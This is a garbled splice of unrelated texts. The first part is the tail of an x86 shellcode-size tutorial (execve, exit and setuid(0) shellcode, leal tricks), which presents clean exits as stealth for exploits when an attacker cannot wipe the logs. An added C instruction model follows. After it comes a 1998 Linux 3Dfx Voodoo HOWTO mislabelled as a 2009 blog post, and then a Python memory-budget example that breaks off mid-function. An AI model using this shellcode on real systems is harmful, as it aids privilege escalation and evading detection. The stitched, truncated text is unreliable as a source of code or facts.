%ebx<br />push %edx<br />push %ebx<br />mov %esp,%ecx<br />movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1<br />int $0x80<br /><br />divl %eax # -1 / -1 = 1<br />int $0x80<br /><br />Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? 
Well, in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax: anything that will make %eax non-zero. Some people say that exits are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right, too: if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIGILL (illegal instruction), which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.



Unlocking the power of leal

The leal instruction is an often-neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 17(%ecx),%eax   # %eax = %ecx + 17 (17 decimal, i.e. 0x11)

This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a value of the type long into its destination operand. In its normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is zeroed and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this to accomplish the same thing:

xorl %eax,%eax
movb $17,%al         # movb needs the byte-sized %al, not %eax

I can hear you saying, "but that shellcode is a byte shorter than the leal one", and you're quite right. However, in a real shellcode you may already have to zero out a register like ecx (or any other register), so the xorl instruction in the leal shellcode isn't counted.
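To check the register effects claimed above for mul, div and leal without assembling anything, here is a small C model of those three 32-bit instructions, written from their architectural definitions: EDX receives the high 32 bits of a mul, div divides EDX:EAX by its operand and raises #DE when the divisor is zero or the quotient does not fit in 32 bits, and lea only computes base plus displacement. This is an added example, not code from the original post; the regs_t struct and the x86_mul, x86_div, x86_lea, mul_zeroes_three and div_self names are my own. Besides the happy path it covers the "what if the syscall returns 0" case from the text and the less obvious one where %edx is not zero when divl %eax runs.

```c
/*
 * Added example (not from the original post): a C model of the 32-bit
 * x86 mul, div and lea instructions, written from the architectural
 * definitions so the register effects can be checked on any host.
 *
 *   mul  r32        : EDX:EAX = EAX * r32        (EDX = high 32 bits)
 *   div  r32        : EAX = EDX:EAX / r32, EDX = remainder; #DE when
 *                     r32 == 0 or the quotient exceeds 32 bits
 *   lea  d(base),r32: r32 = base + d             (no memory access)
 */
#include <stdint.h>
#include <stdio.h>

/* Minimal register file: only what the post's snippets touch. */
typedef struct {
    uint32_t eax, ebx, ecx, edx;
} regs_t;

/* mul r32: EAX times operand, the 64-bit product lands in EDX:EAX. */
static void x86_mul(regs_t *r, uint32_t operand)
{
    uint64_t product = (uint64_t)r->eax * operand;
    r->eax = (uint32_t)product;          /* low 32 bits  */
    r->edx = (uint32_t)(product >> 32);  /* high 32 bits */
}

/* div r32: unsigned EDX:EAX / operand. Returns 0 on success, -1 where
 * the CPU would raise #DE (the process then gets SIGFPE, not exit). */
static int x86_div(regs_t *r, uint32_t operand)
{
    uint64_t dividend = ((uint64_t)r->edx << 32) | r->eax;
    if (operand == 0 || dividend / operand > UINT32_MAX)
        return -1;
    r->edx = (uint32_t)(dividend % operand);
    r->eax = (uint32_t)(dividend / operand);
    return 0;
}

/* lea d(base), r32: plain address arithmetic, wraps modulo 2^32. */
static uint32_t x86_lea(uint32_t base, int32_t disp)
{
    return base + (uint32_t)disp;
}

/* xorl %ecx,%ecx ; mul %ecx -- zeroes EAX, ECX and EDX whatever EAX and
 * EDX held before. Returns 1 when all three registers are zero. */
int mul_zeroes_three(uint32_t eax_before, uint32_t edx_before)
{
    regs_t r = { .eax = eax_before, .ebx = 0, .ecx = 0, .edx = edx_before };
    r.ecx ^= r.ecx;
    x86_mul(&r, r.ecx);
    return r.eax == 0 && r.ecx == 0 && r.edx == 0;
}

/* divl %eax after a syscall left `ret` in EAX and `edx` in EDX. Returns
 * the resulting EAX (the number the next int $0x80 would dispatch on),
 * or -1 if the CPU would fault instead of continuing. */
int64_t div_self(uint32_t ret, uint32_t edx)
{
    regs_t r = { .eax = ret, .ebx = 0, .ecx = 0, .edx = edx };
    if (x86_div(&r, r.eax) != 0)
        return -1;
    return r.eax;
}

int main(void)
{
    printf("mul by zero clears eax/ecx/edx: %d\n",
           mul_zeroes_three(0xdeadbeefu, 0x12345678u));
    printf("divl %%eax, eax=-1 edx=0        -> %lld  (exit)\n",
           (long long)div_self(0xffffffffu, 0));
    printf("divl %%eax, eax=-2 edx=0        -> %lld  (still exit)\n",
           (long long)div_self(0xfffffffeu, 0));
    printf("divl %%eax, eax=-1 edx=1        -> %lld  (syscall 2, not exit)\n",
           (long long)div_self(0xffffffffu, 1));
    printf("divl %%eax, eax=-1 edx=-1       -> %lld  (#DE, quotient overflow)\n",
           (long long)div_self(0xffffffffu, 0xffffffffu));
    printf("divl %%eax, eax=0               -> %lld  (#DE, divide by zero)\n",
           (long long)div_self(0, 0));
    printf("leal 17(%%ecx),%%eax, ecx=0     -> %u\n", (unsigned)x86_lea(0, 17));
    return 0;
}
```

The two div cases that do not yield 1 are the ones worth remembering when reading or analysing shellcode like the above: a zero in %eax faults with SIGFPE instead of exiting, and a non-zero %edx changes the quotient (with %edx = 1 the next int $0x80 dispatches syscall 2, and with %edx = 0xffffffff the division faults), so the earlier mul that cleared %edx is doing more than just providing a zero to push.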
Here's an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al          # setuid() is syscall 23 (0x17)
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%eax    # lea needs a full-width destination, so %eax rather than %al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying "but that's only one byte, it doesn't make that much of a difference", and you're right: here it doesn't make much of a difference (except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.



Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.


3Dfx graphics accelerator chip support for Linux. (blog post dated 2009-06-27)

1. Introduction

This is the Linux 3Dfx HOWTO document. It is intended as a quick reference covering everything you need to know to install and configure 3Dfx support under Linux. Frequently asked questions regarding the 3Dfx support are answered, and references are given to some other sources of information on a variety of topics related to computer generated, hardware accelerated 3D graphics.

This information is only valid for Linux on the Intel platform. Some information may be applicable to other processor architectures, but I have no first hand experience or information on this. It is only applicable to boards based on 3Dfx technology; any other graphics accelerator hardware is beyond the scope of this document.

1.1.
Contributors and Contacts

This document would not have been possible without all the information contributed by other people - those involved in the Linux Glide port and the beta testing process, in the development of Mesa and the Mesa Voodoo drivers, or reviewing the document on behalf of 3Dfx and Quantum3D. Some of them contributed entire sections to this document.

Daryll Strauss daryll@harlot.rb.ca.us did the port, Paul J. Metzger pjm@rbd.com modified the Mesa Voodoo driver (written by David Bucciarelli tech.hmw@plus.it) for Linux, Brian Paul brianp@RA.AVID.COM integrated it with his famous Mesa library. With respect to Voodoo Graphics (tm) accelerated Mesa, additional thanks has to go to Henri Fousse, Gary McTaggart, and the maintainer of the 3Dfx Mesa for DOS, Charlie Wallace Charlie.Wallace@unistudios.com. The folks at 3Dfx, notably Gary Sanders, Rod Hughes, and Marty Franz, provided valuable input, as did Ross Q. Smith of Quantum3D. The pages on the Voodoo Extreme and Operation 3Dfx websites provided useful info as well, and in some cases I relied on the 3Dfx local newsgroups. The Linux glQuake2 port that uses Linux Glide and Mesa is maintained by Dave Kirsch zoid@idsoftware.com. Thanks to all those who sent e-mail regarding corrections and updates, and special thanks to Mark Atkinson for reminding me of the dual cable setup.

Thanks to the SGML-Tools package (formerly known as Linuxdoc-SGML), this HOWTO is available in several formats, all generated from a common source file. For information on SGML-Tools see its homepage at pobox.com/~cg/sgmltools.

1.2. Acknowledgments

3Dfx, the 3Dfx Interactive logo, Voodoo Graphics (tm), and Voodoo Rush (tm) are registered trademarks of 3Dfx Interactive, Inc.
Glide, TexUS, Pixelfx and Texelfx are trademarks of 3Dfx Interactive, Inc. OpenGL is a registered trademark of Silicon Graphics. Obsidian is a trademark of Quantum3D. Other product names are trademarks of the respective holders, and are hereby considered properly acknowledged.

1.3. Revision History

Version 1.03
First version for public release.

Version 1.16
Current version v1.16, 6 February 1998.

1.4. New versions of this document

You will find the most recent version of this document at www.gamers.org/dEngine/xf3D/.

New versions of this document will be periodically posted to the comp.os.linux.answers newsgroup. They will also be uploaded to various anonymous ftp sites that archive such information, including ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/.

Hypertext versions of this and other Linux HOWTOs are available on many World-Wide-Web sites, including sunsite.unc.edu/LDP/. Most Linux CD-ROM distributions include the HOWTOs, often under the /usr/doc directory, and you can also buy printed copies from several vendors.

If you make a translation of this document into another language, let me know and I'll include a reference to it here.

1.5. Feedback

I rely on you, the reader, to make this HOWTO useful. If you have any suggestions, corrections, or comments, please send them to me (bk@gamers.org), and I will try to incorporate them in the next revision.
Please add "HOWTO 3Dfx" to the Subject line of the mail, so procmail will dump it in the appropriate folder.

Before sending bug reports or questions, please read all of the information in this HOWTO, and send detailed information about the problem.

If you publish this document on a CD-ROM or in hardcopy form, a complimentary copy would be appreciated. Mail me for my postal address. Also consider making a donation to the Linux Documentation Project to help support free documentation for Linux. Contact the Linux HOWTO coordinator, Tim Bynum (linux-howto@sunsite.unc.edu), for more information.

1.6. Distribution Policy

Copyright (c) 1997, 1998 by Bernd Kreimeier. This document may be distributed under the terms set forth in the LDP license at sunsite.unc.edu/LDP/COPYRIGHT.html.

This HOWTO is free documentation; you can redistribute it and/or modify it under the terms of the LDP license. This document is distributed in the hope that it will be useful, but without any warranty; without even the implied warranty of merchantability or fitness for a particular purpose. See the LDP license for more details.

2. Graphics Accelerator Technology

2.1. Basics

This section gives a very cursory overview of computer graphics accelerator technology, in order to help you understand the concepts used later in the document. You should consult e.g. a book on OpenGL in order to learn more.

2.2.
Hardware configuration

Graphics accelerators come in different flavors: either as a separate PCI board that is able to pass through the video signal of a (possibly 2D or video accelerated) VGA board, or as a PCI board that does both VGA and 3D graphics (effectively replacing older VGA controllers). The 3Dfx boards based on the Voodoo Graphics (tm) belong to the former category. We will get into this again later.

If there is no address conflict, any 3D accelerator board could be present under Linux without interfering, but in order to access the accelerator, you will need a driver. A combined 2D/3D accelerator might behave differently.

2.3. A bit of Voodoo Graphics (tm) architecture

Usually, accessing texture memory and frame/depth buffer is a major bottleneck. For each pixel on the screen, there are at least one (nearest), four (bi-linear), or eight (tri-linear mipmapped) read accesses to texture memory, plus a read/write to the depth buffer, and a read/write to frame buffer memory.

The Voodoo Graphics (tm) architecture separates texture memory from frame/depth buffer memory by introducing two separate rendering stages, with two corresponding units (Pixelfx and Texelfx), each having a separate memory interface to dedicated memory. This gives an above-average fill rate, paid for with restrictions in memory management (e.g. unused framebuffer memory can not be used for texture caching).

Moreover, a Voodoo Graphics (tm) could use two TMUs (texture management or Texelfx units), and finally, two Voodoo Graphics (tm) could be combined with a mechanism called Scan-Line Interleaving (SLI).
SLI essentially means that each Pixelfx unit effectively provides only every other scanline, which decreases the bandwidth impact on each Pixelfx's framebuffer memory.

3. Installation

Configuring Linux to support 3Dfx accelerators involves the following steps:

1. Installing the board.

2. Installing the Glide distribution.

3. Compiling, linking and/or running the application.

The next sections will cover each of these steps in detail.

3.1. Installing the board

Follow the manufacturer's instructions for installing the hardware or have your dealer perform the installation. It should not be necessary to select settings for IRQ or DMA channel; either Plug&Pray (tm) or factory defaults should work. The add-on boards described here are memory mapped devices and do not use IRQs. The only kind of conflict to avoid is memory overlap with other devices.

As 3Dfx does not develop or sell any boards, do not contact them on any problems.

3.1.1. Troubleshooting the hardware installation

To check the installation and the memory mapping, do cat /proc/pci. The output should contain something like

______________________________________________________________________
Bus 0, device 12, function 0:
VGA compatible controller: S3 Inc. Vision 968 (rev 0).
Medium devsel. IRQ 11.
Non-prefetchable 32 bit memory at 0xf4000000.

Bus 0, device 9, function 0:
Multimedia video controller: Unknown vendor Unknown device (rev 2).
Vendor id=121a. Device id=1.
Fast devsel. Fast back-to-back capable.
Prefetchable 32 bit memory at 0xfb000000.
______________________________________________________________________

for a Diamond Monster 3D used with a Diamond Stealth-64.
Additionally, a cat /proc/cpuinfo /proc/meminfo might be helpful for tracking down conflicts and/or submitting a bug report.

With current kernels, you will probably get a boot warning like

______________________________________________________________________
Jun 12 12:31:52 hal kernel: Warning : Unknown PCI device (121a:1).
Please read include/linux/pci.h
______________________________________________________________________

which can be safely ignored. If you happen to have a board that is not very common, or have encountered a new revision, you should take the time to follow the advice in /usr/include/linux/pci.h and send all necessary information to linux-pcisupport@cao-vlsi.ibp.fr.

If you experience any problems with the board, you should try to verify that DOS and/or Win95 or NT support works. You will probably not receive any useful response from a board manufacturer on a bug report or request regarding Linux. Having dealt with the Diamond support e-mail system, I would not expect useful responses for other operating systems either.

3.1.2. Configuring the kernel

There is no kernel configuration necessary, as long as PCI support is enabled. The Linux Kernel HOWTO <http://sunsite.unc.edu/mdw/HOWTO/Kernel-HOWTO.html> should be consulted for the details of building a kernel.

3.1.3. Configuring devices

The current drivers do not (yet) require any special devices. This is different from other driver developments (e.g. the sound drivers, where you will find a /dev/dsp and /dev/audio). The driver uses the /dev/mem device, which should always be available. In consequence, you need to use setuid or root privileges to access the accelerator board.

3.2.
Setting up the Displays

There are two possible setups with add-on boards. You could either pass through the video signal from your regular VGA board via the accelerator board to the display, or you could use two displays at the same time. Refer to the manual provided by the board manufacturer for details. Both configurations have been tried with the Monster 3D board.

3.2.1. Single screen display solution

This configuration allows you to check basic operations of the accelerator board - if the video signal is not transmitted to the display, hardware failure is possible.

Beware that the video output signal might deteriorate significantly if passed through the video board. To a degree, this is inevitable. However, reviews have complained about the below-average quality of the cables provided e.g. with the Monster 3D, and judging from the one I tested, this has not changed.

There are other pitfalls in single screen configurations. Switching from the VGA display mode to the accelerated display mode will change resolution and refresh rate as well, even if you are using 640x480 e.g. with X11, too. Moreover, if you are running X11, your application is responsible for grabbing all keyboard and mouse events, or you might get stuck because of changed input focus and exposure on the X11 display (which is effectively invisible when the accelerated mode is used). You could use SVGA console mode instead of X11.

If you are going to use a single screen configuration and switch modes often, remember that your monitor hardware might not enjoy this kind of use.

3.2.2. Single screen dual cable setup

Some high end monitors (e.g. the EIZO F-784-T) come with two connectors, one with 5 BNC connectors for RGB, HSync, VSync, the other e.g.
a regular VGA or a 13W3 Sub-D VGA. These displays usually also feature a front panel input selector to safely switch from one to the other. It is thus possible to use e.g. a VGA-to-BNC cable with your high end 2D card, and a VGA-to-13W3 Sub-D cable with your 3Dfx, and effectively run dual screen on one display.

3.2.3. Dual screen display solution

The accelerator board does not need the VGA input signal. Instead of routing the common video output through the accelerator board, you could attach a second monitor to its output, and use both at the same time. This solution is more expensive, but gives the best results, as your main display will still be hi-res and without the signal quality losses involved in a pass-through solution. In addition, you could use X11 and the accelerated full screen display in parallel, for development and debugging.

A common problem is that the accelerator board will not provide any video signal when not used. In consequence, each time the graphics application terminates, the hardware screensave/powersave might kick in, depending on your monitor's configuration. Again, your hardware might not enjoy being treated like this. You should use

______________________________________________________________________
setenv SST_DUALSCREEN 1
______________________________________________________________________

to force continued video output in this setup.

3.3. Installing the Glide distribution

The Glide driver and library are provided as a single compressed archive. Use tar and gzip to unpack, and follow the instructions in the README and INSTALL accompanying the distribution. Read the install script and run it.
Installation puts everything in /usr/local/glide/{include,lib,bin} and sets ld.conf to look there. Where it installs and setting ld.conf are independent actions. If you skip the ld.conf step then you need to set LD_LIBRARY_PATH.

You will need to install the header files in a location available at compile time, if you want to compile your own graphics applications. If you do not want to use the installation as above (i.e. you insist on a different location), make sure that any application could access the shared library at runtime, or you will get a response like "can't load library 'libglide.so'".

3.3.1. Using the detect program

There is a bin/detect program in the distribution (the source is not available). You have to run it as root, and you will get something like

______________________________________________________________________
slot vendorId devId  baseAddr0  command description
---- -------- ------ ---------- ------- -----------
00   0x8086   0x122d 0x00000000 0x0006  Intel:430FX (Triton)
07   0x8086   0x122e 0x00000000 0x0007  Intel:ISA bridge
09   0x121a   0x0001 0xfb000008 0x0002  3Dfx:video multimedia adapter
10   0x1000   0x0001 0x0000e401 0x0007  ???:SCSI bus controller
11   0x9004   0x8178 0x0000e001 0x0017  Adaptec:SCSI bus controller
12   0x5333   0x88f0 0xf4000000 0x0083  S3:VGA-compatible display co
______________________________________________________________________

as a result. If you do not have root privileges, the program will bail out with

______________________________________________________________________
Permission denied: Failed to change I/O privilege. Are you root?
______________________________________________________________________

This output might come in handy for a bug report as well.

3.3.2.
Using the test programs

Within the Glide distribution, you will find a folder with test programs. Note that these test programs are under 3Dfx copyright, and are legally available for use only if you have purchased a board with a 3Dfx chipset. See the LICENSE file in the distribution, or their web site www.3dfx.com for details.

It is recommended to compile and link the test programs even if there happen to be binaries in the distribution. Note that some of the programs will require some files like alpha.3df from the distribution to be available in the same folder. All test programs use the 640x480 screen resolution. Some will request a variety of single character inputs, others will just state "Press A Key To Begin Test". Beware of loss of input focus if running X11 on the same screen at the same time.

See the README.test for a list of programs, and other details.

4. Answers To Frequently Asked Questions

The following section answers some of the questions that (will) have been asked on the Usenet news groups and mailing lists. The FAQ has been subdivided into several parts for convenience, namely

o FAQ: Requirements?

o FAQ: Voodoo Graphics (tm)? 3Dfx?

o FAQ: Glide?

o FAQ: Glide and SVGA?

o FAQ: Glide and XFree86?

o FAQ: Glide versus OpenGL/Mesa?

o FAQ: But Quake?

o FAQ: Troubleshooting?

Each section lists several questions and answers, which will hopefully address most problems.

5. FAQ: Requirements?

5.1. What are the system requirements?

A Linux PC, PCI 2.1 compliant, a monitor capable of 640x480, and a 3D accelerator board based on the 3Dfx Voodoo Graphics (tm). It will work on a P5 or P6, with or without MMX.
The current version does not use MMX, but it has some optimized code paths for P6.

At one point, some 3Dfx statements seemed to imply that using Linux Glide required using a RedHat distribution. Note that while Linux Glide was originally ported in a RedHat 4.1 environment, it has been used and tested with many other Linux distributions, including homebrew, Slackware, and Debian 1.3.1.

5.2. Does it work with Linux-Alpha?

There is currently no Linux Glide distribution available for any platform besides i586. As the Glide sources are not available for distribution, you will have to wait for the binary. Quantum3D has announced DEC Alpha support for 2H97. Please contact Daryll Strauss if you are interested in supporting this.

There is also the issue of porting the assembly modules. While there are alternative C paths in the code, the assembly module in Glide (essentially triangle setup) offered significant performance gains depending on the P5 CPU used.

5.3. Which 3Dfx chipsets are supported?

Currently, the 3Dfx Voodoo Graphics (tm) chipset is supported under Linux. The Voodoo Rush (tm) chipset is not yet supported.

5.4. Is the Voodoo Rush (tm) supported?

The current port of Glide to Linux does not support the Voodoo Rush (tm). An update is in the works.

The problem is that at one point the Voodoo Rush (tm) driver code in Glide depended on Direct Draw. There was an SST96 based DOS portion in the library that could theoretically be used for Linux, as soon as all portions residing in the 2D/Direct Draw/D3D combo driver are replaced.

Thus Voodoo Rush (tm) based boards like the Hercules Stingray 128/3D or Intergraph Intense Rush are not supported yet.

5.5.
Which boards are supported?

There are no officially supported boards, as 3Dfx does not sell any boards. This section does not attempt to list all boards; it will just give an overview, and will list only boards that have been found to cause trouble.

It is important to recognize that Linux support for a given board does not only require a driver for the 3D accelerator component. If a board features its own VGA core as well, support by either Linux SVGA or XFree86 is required as well (see the section about the Voodoo Rush (tm) chipset). Currently, an add-on solution is recommended, as it allows you to choose a regular graphics board well supported for Linux. There are other aspects discussed below.

All Quantum3D Obsidian boards, independent of texture memory, frame buffer memory, number of Pixelfx and Texelfx units, and SLI, should work. Same for all other Voodoo Graphics (tm) based boards, like Orchid Righteous 3D, Canopus Pure 3D, Flash 3D, and Diamond Monster 3D. Voodoo Rush (tm) based boards are not yet supported.

Boards that are not based on 3Dfx chipsets (e.g. manufactured by S3, Matrox, 3Dlabs, Videologic) do not work with the 3Dfx drivers and are beyond the scope of this document.

5.6. How do boards differ?

As the board manufacturers are using the same chipset, any differences are due to board design. Examples are quality of the pass-through cable and connectors (reportedly, Orchid provided better quality than Diamond), availability of a TV-compliant video signal output (Canopus Pure 3D), and, most notably, memory size on board.

Most common were boards for games with 2MB texture cache and 2 MB framebuffer memory; however, the Canopus Pure3D comes with a maximal 4 MB texture cache, which is an advantage e.g.
with games using dynamically changed textures, and/or illumination textures (Quake, most notably). The memory architecture of a typical Voodoo Graphics (tm) board is described below, in a separate section.

Quantum 3D offers the widest selection of 3Dfx-based boards, and is probably the place to go if you are looking for a high end Voodoo Graphics (tm) based board configuration. Quantum 3D is addressing the visual simulation market, while most of the other vendors are only targeting the consumer-level PC-game market.

5.7. What about AGP?

There is no Voodoo Graphics (tm) or Voodoo Rush (tm) AGP board that I am aware of. I am not aware of AGP support under Linux, and I do not know whether upcoming AGP boards using 3Dfx technology might possibly be supported with Linux.

6. FAQ: Voodoo Graphics (tm)? 3Dfx?

6.1. Who is 3Dfx?

3Dfx is a San Jose based manufacturer of 3D graphics accelerator hardware for arcade games, game consoles, and PC boards. Their official website is www.3dfx.com. 3Dfx does not sell any boards, but other companies do, e.g. Quantum3D.

6.2. Who is Quantum3D?

Quantum3D started as a 3Dfx spin-off, manufacturing high end accelerator boards based on 3Dfx chip technology for the consumer and business market, and supplying arcade game technology. See their home page at www.quantum3d.com for additional information. For general inquiries regarding Quantum3D, please send mail to info@quantum3d.

6.3. What is the Voodoo Graphics (tm)?

The Voodoo Graphics (tm) is a chipset manufactured by 3Dfx. It is used in hardware acceleration boards for the PC. See the HOWTO section on supported hardware.

6.4.
What is the Voodoo Rush (tm)?

The Voodoo Rush (tm) is a derivative of the Voodoo Graphics (tm) that has an interface to cooperate with a 2D VGA video accelerator, effectively supporting accelerated graphics in windows. This combo is currently not supported with Linux.

6.5. What is the Voodoo 2 (tm)?

The Voodoo 2 (tm) is the successor of the Voodoo Graphics (tm) chipset, featuring several improvements. It is announced for late March 1998, and announcements of Voodoo 2 (tm) based boards have been published e.g. by Quantum 3D, by Creative Labs, Orchid Technologies, and Diamond Multimedia.

The Voodoo 2 (tm) is supposed to be backwards compatible. However, a new version of Glide will have to be ported to Linux.

6.6. What is VGA pass-through?

The Voodoo Graphics (tm) (but not the Voodoo Rush (tm)) boards are add-on boards, meant to be used with a regular 2D VGA video accelerator board. In short, the video output of your regular VGA board is used as input for the Voodoo Graphics (tm) based add-on board, which by default passes it through to the display also connected to the Voodoo Graphics (tm) board. If the Voodoo Graphics (tm) is used (e.g. by a game), it will disconnect the VGA input signal, switch the display to a 640x480 fullscreen mode with the refresh rate configured by SST variables and the application/driver, and generate the video signal itself. The VGA doesn't need to be aware of this, and won't be.

This setup has several advantages: free choice of 2D VGA board, which is an issue with Linux, as XFree86 drivers aren't available for all chipsets and revisions, and a cost effective migration path to accelerated 3D graphics.
It also has several disadvantages: an application using the Voodoo Graphics (tm) might not re-enable video output when crashing, and the regular VGA video signal deteriorates in the pass-through process.

6.7. What is Texelfx or TMU?

Voodoo Graphics (tm) chipsets have two units. The first one interfaces the texture memory on the board, does the texture mapping, and ultimately generates the input for the second unit that interfaces the framebuffer. This one is called Texelfx, aka Texture Management Unit, aka TMU. The neat thing about this is that a board can use two Texelfx instead of only one, like some of the Quantum3D Obsidian boards did, effectively doubling the processing power in some cases, depending on the application.

As each Texelfx can address 4MB texture memory, a dual Texelfx setup has an effective texture cache of up to 8MB. This can be true even if only one Texelfx is actually needed by a particular application, as textures can be distributed to both Texelfx, which are used depending on the requested texture. Both Texelfx are used together to perform certain operations such as trilinear filtering and illumination texture/lightmap passes (e.g. in glQuake) in a single pass instead of the two passes that are required with only one Texelfx. To actually exploit the theoretically available speedup and cache size increase, a Glide application has to use both Texelfx properly.

The two Texelfx can not be used separately to each draw a textured triangle at the same time. A triangle is always drawn using whatever the current setup is, which can be to use both Texelfx for a single pass operation combining two textures, or one Texelfx for only a single texture. Each Texelfx can only access its own memory.

6.8.
What is a Pixelfx unit?<br /><br /> Voodoo Graphics (tm) chipsets have two units. The second one<br /> interfaces the framebuffer and ultimately generates the depth buffer<br /> and pixel color updates. This one is called Pixelfx. The neat thing<br /> here is that two Pixelfx units can cooperate in SLI mode, like with<br /> some of the Quantum3D Obsidian boards, effectively doubling the frame<br /> rate.<br /><br /><br /><br /> 6.9. What is SLI mode?<br /><br /> SLI means "Scanline Interleave". In this mode, two Pixelfx are<br /> connected and render in alternate turns, one handling odd, the other<br /> handling even scanlines of the actual output. In this mode, each<br /> Pixelfx stores only half of the image and half of the depth buffer<br /> data in its own local framebuffer, effectively doubling the number of<br /> pixels.<br /><br /> The Pixelfx in question can be on the same board, or on two boards<br /> properly connected. Some Quantum3D Obsidian boards support SLI with<br /> Voodoo Graphics (tm).<br /><br /> As two cards can decode the same PCI addresses and receive the same<br /> data, there is not necessarily additional bus bandwidth required by<br /> SLI. On the other hand, texture data will have to be replicated on<br /> both boards, thus the amount of texture memory effectively stays the<br /> same.<br /><br /><br /><br /> 6.10. Is there a single board SLI setup?<br /><br /> There are now two types of Quantum3D SLI boards. The initial setup<br /> used two boards, two PCI slots, and an interconnect (e.g. the Obsidian<br /> 100-4440). The later revision, which performs identically, is contained<br /> on one full-length PCI board (e.g. Obsidian 100-4440SB). Thus a<br /> single board SLI solution is possible, and has been done.<br /><br /><br /><br /> 6.11. How much memory? 
How many buffers?<br /><br /> The most essential difference between different boards using the<br /> Voodoo Graphics (tm) chipset is the amount and organization of memory.<br /> Quantum3D used a three digit scheme to describe boards. Here is a<br /> slightly modified one (anticipating Voodoo 2 (tm)). Note that if you<br /> use more than one Texelfx, they need the same amount of texture cache<br /> memory each, and if you combine two Pixelfx, each needs the same<br /> amount of frame buffer memory.<br /> ______________________________________________________________________<br /> "SLI / Pixelfx / Texelfx1 / Texelfx2 "<br /> ______________________________________________________________________<br /><br /><br /> It means that a common 2MB+2MB board would be a 1/2/2/0 solution, with<br /> the minimally required total 4MB of memory. A Canopus Pure 3D would be<br /> 1/2/4/0, or 6MB. An Obsidian-2220 board with two Texelfx would be<br /> 1/2/2/2, and an Obsidian SLI-2440 board would be 2/2/4/4. A fully<br /> featured dual board solution (2 Pixelfx, each with 2 Texelfx and 4MB<br /> frame buffer, each Texelfx 4 MB texture cache) would be 2/4/4/4, and<br /> the total amount of memory would be SLI*(Pixelfx+Texelfx1+Texelfx2),<br /> or 24 MB.<br /><br /> So there.<br /><br /><br /> 6.12. Does the Voodoo Graphics (tm) do 24 or 32 bit color?<br /><br /> No. The Voodoo Graphics (tm) architecture uses 16bpp internally. This<br /> is true for Voodoo Graphics (tm), Voodoo Rush (tm) and Voodoo 2 (tm)<br /> alike. Quantum3D claims to implement 22-bpp effective color depth with<br /> an enhanced 16-bpp frame buffer, though.<br /><br /><br /> 6.13. Does the Voodoo Graphics (tm) store 24 or 32 bit z-buffer per<br /> pixel?<br /><br /> No. The Voodoo Graphics (tm) architecture uses 16bpp internally for<br /> the depth buffer, too. This again is true for Voodoo Graphics (tm),<br /> Voodoo Rush (tm) and Voodoo 2 (tm) alike. 
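The 6.11 memory scheme and the frame buffer footprint rules given in 6.14 (32-pixel alignment of the footprint, two bytes per color and depth sample, SLI halving what each Pixelfx stores, the 1024x768 ceiling) worked through in Python. This is an added example, not code from the HOWTO, 3Dfx or Quantum3D; treating stereo buffering as a doubling of the color buffers is this example's own assumption.

```python
"""Frame buffer and board memory budgeting for Voodoo Graphics (tm) boards.

Added example, not part of the HOWTO. It encodes the figures the FAQ gives:
16 bpp color and 16 bpp depth (6.12, 6.13), the 'SLI/Pixelfx/Texelfx1/Texelfx2'
scheme (6.11), the 32-pixel alignment of the memory footprint, SLI halving
the image stored per Pixelfx, and the 1024x768 hardware ceiling (6.14).
"""

MB = 1024 * 1024
BYTES_PER_PIXEL = 2        # 16 bits for each color pixel and each depth value
ALIGNMENT = 32             # the "virtual" footprint is rounded up to multiples of 32
MAX_WIDTH, MAX_HEIGHT = 1024, 768   # overall hardware limit, SLI or not
MAX_FRAMEBUFFER_MB = 4     # per Pixelfx
MAX_TEXTURE_MB = 4         # per Texelfx (6.7)


def align_up(n: int, step: int = ALIGNMENT) -> int:
    """Round n up to the next multiple of step: 720 -> 736, 960 -> 960."""
    return -(-n // step) * step


def footprint_bytes(width: int, height: int, color_buffers: int = 2,
                    depth: bool = True, stereo: bool = False) -> int:
    """Bytes one Pixelfx needs for the whole image (before any SLI split).

    color_buffers is 2 for double and 3 for triple buffering. Stereo (for LCD
    shutters) is modelled as doubling the color buffers; that reading of 6.14
    is an assumption of this example, not a statement of the FAQ.
    """
    planes = color_buffers * (2 if stereo else 1) + (1 if depth else 0)
    return align_up(width) * align_up(height) * BYTES_PER_PIXEL * planes


def fits(width: int, height: int, fb_mb: int, color_buffers: int = 2,
         depth: bool = True, stereo: bool = False, sli: int = 1) -> bool:
    """Does the mode fit on a board with fb_mb MB of frame buffer per Pixelfx?

    With sli == 2 each Pixelfx stores only the odd or the even scanlines, so it
    holds half the footprint; the 1024x768 ceiling applies regardless.
    """
    if sli not in (1, 2) or fb_mb > MAX_FRAMEBUFFER_MB:
        raise ValueError("not a Voodoo Graphics (tm) configuration")
    if width > MAX_WIDTH or height > MAX_HEIGHT:
        return False
    need = footprint_bytes(width, height, color_buffers, depth, stereo)
    return need <= fb_mb * MB * sli


def total_memory_mb(scheme: str) -> int:
    """Total on-board memory for a 'SLI/Pixelfx/Texelfx1/Texelfx2' string.

    Applies the FAQ's formula SLI * (Pixelfx + Texelfx1 + Texelfx2) after
    checking the per-unit limits, e.g. '2/4/4/4' -> 24.
    """
    sli, pixelfx, tex1, tex2 = (int(part) for part in scheme.split("/"))
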